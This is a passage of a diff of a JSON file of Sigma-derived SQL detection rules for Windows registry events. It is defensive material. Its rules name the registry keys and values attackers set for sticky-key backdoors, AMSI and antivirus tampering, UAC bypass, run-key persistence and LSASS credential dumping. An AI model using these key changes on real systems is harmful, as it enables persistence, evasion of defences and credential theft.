"Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((NewValue LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR NewValue LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' 
ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" ], - "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "registry_event_stickykey_like_backdoor.yml" }, { - "title": "Potential AutoLogger Sessions Tampering", - "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", - "status": "experimental", - "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Camera and Microphone Access", + "id": "62120148-6b7a-42be-8b91-271c04e281a3", + "status": "test", + "description": "Detects Processes accessing the camera and microphone from suspicious folder", + "author": "Den Iuzvyk", "tags": [ - "attack.defense_evasion" + "attack.collection", + "attack.t1125", + "attack.t1123" ], "falsepositives": [ - "Unknown" + "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing 
registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE '%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE '%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Desktop#%' ESCAPE '\\'))" ], - "filename": "registry_set_disable_autologger_sessions.yml" + "filename": "registry_event_susp_mic_cam_access.yml" }, { - "title": "Potential AMSI COM Server Hijacking", - "id": "160d2780-31f7-4922-8b3a-efce30e63e96", - "status": "experimental", - "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. 
This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "RedMimicry Winnti Playbook Registry Manipulation", + "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", + "status": "test", + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (NewValue LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" - ], - "filename": "registry_set_amsi_com_hijack.yml" - }, - { - "title": "Potential Persistence Via Excel Add-in - Registry", - "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", - "status": "experimental", - "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND NewValue LIKE '/R %' ESCAPE '\\' AND NewValue LIKE '%.xll' ESCAPE '\\')" - ], - "filename": "registry_set_persistence_xll.yml" - }, - { - "title": "Tamper With Sophos AV Registry Keys", - "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", - "status": "experimental", - 
"description": "Detects tamper attempts to sophos av functionality via registry key modification", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" ], - "filename": "registry_set_sophos_av_tamper.yml" + "filename": "registry_event_redmimicry_winnti_reg.yml" }, { - "title": "Registry Persitence via Service in Safe Mode", - "id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", + "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", + "id": "55e29995-75e7-451a-bef0-6225e2f13597", "status": "experimental", - "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", - "author": "frack113", + "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1003.001" ], 
"falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND NewValue = 'Service') AND NOT ((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" ], - "filename": "registry_set_add_load_service_in_safe_mode.yml" + "filename": "registry_event_silentprocessexit_lsass.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Registry", - "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "title": "Shell Open Registry Keys Manipulation", + "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. 
UACMe 33 or 62)", "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1548.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND NewValue = 'Binary Data')" - ], - "filename": "registry_set_uac_bypass_wmp.yml" - }, - { - "title": "Disable Macro Runtime Scan Scope", - "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", - "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", - "status": "experimental", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" - ], - "filename": "registry_set_disable_macroruntimescanscope.yml" - }, - { - "title": "Set TimeProviders DllName", - "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", - "status": "experimental", - "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system 
boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.003" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (NewValue LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" - ], - "filename": "registry_set_timeproviders_dllname.yml" - }, - { - "title": "New RUN Key Pointing to Suspicious Folder", - "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", - "status": "experimental", - "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", - "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "falsepositives": [ - "Software using weird folders for updates" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((NewValue LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue 
LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (NewValue LIKE '\\%Public\\%\\\\%' ESCAPE '\\' OR NewValue LIKE 'wscript%' ESCAPE '\\' OR NewValue LIKE 'cscript%' ESCAPE '\\')))" - ], - "filename": "registry_set_susp_run_key_img_folder.yml" - }, - { - "title": "Change the Fax Dll", - "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", - "status": "experimental", - "description": "Detect possible persistence using Fax DLL load when service restart", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImageName%' ESCAPE '\\') AND NOT (NewValue LIKE '\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" - ], - "filename": "registry_set_fax_dll_persistance.yml" - }, - { - "title": "Change Winevt Event Access Permission Via Registry", - "id": "7d9263bd-dc47-4a58-bc92-5474abab390c", - "status": "experimental", - "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.t1548.002", + "attack.t1546.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ChannelAccess' ESCAPE '\\' AND (NewValue LIKE '%(A;;0x1;;;SY)%' 
ESCAPE '\\' OR NewValue LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR NewValue LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND NewValue LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))))" ], - "filename": "registry_set_change_winevt_channelaccess.yml" + "filename": "registry_event_shell_open_keys_manipulation.yml" }, { - "title": "Suspicious Printer Driver Empty Manufacturer", - "id": "e0813366-0407-449a-9869-a2db1119dc41", + "title": "Esentutl Volume Shadow Copy Service Keys", + "id": "5aad0995-46ab-41bd-a9ff-724f41114971", "status": "test", - "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" - ], - "falsepositives": [ - "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows 
x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND NewValue = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE '\\')))" - ], - "filename": "registry_set_susp_printer_driver.yml" - }, - { - "title": "Registry Disable System Restore", - "id": "5de03871-5d46-4539-a82d-3aa992a69a83", - "status": "experimental", - "description": "Detects the modification of the registry to disable a system restore on the computer", - "author": "frack113", - "tags": [ - "attack.impact", - "attack.t1490" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE '%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" - ], - "filename": "registry_set_disable_system_restore.yml" - }, - { - "title": "Add Port Monitor Persistence in Registry", - "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", - "status": "experimental", - "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1547.010" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 
'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND NewValue LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC Printer%' ESCAPE '\\')))" - ], - "filename": "registry_set_add_port_monitor.yml" - }, - { - "title": "Usage of Renamed Sysinternals Tools - RegistrySet", - "id": "8023f872-3f1d-4301-a384-801889917ab4", - "status": "experimental", - "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory 
Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" - ], - "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" - }, - { - "title": "Disable Sysmon Event Logging Via Registry", - "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", - "status": "experimental", - "description": "Detects changes in Sysmon driver altitude. 
If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", - "author": "B.Talebi", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Legitimate driver altitude change to hide sysmon" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" - ], - "filename": "registry_set_change_sysmon_driver_altitude.yml" - }, - { - "title": "Disabled RestrictedAdminMode For RDS", - "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", - "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1112" + "description": "Detects the volume shadow copy service initialization and processing via esentutl. 
Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND NewProcessName LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" ], - "filename": "registry_set_lsa_disablerestrictedadmin.yml" + "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" }, { - "title": "Suspicious Application Allowed Through Exploit Guard", - "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", - "status": "experimental", - "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Narrator's Feedback-Hub Persistence", + "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", + "status": "test", + "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = 
'4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR TargetObject LIKE 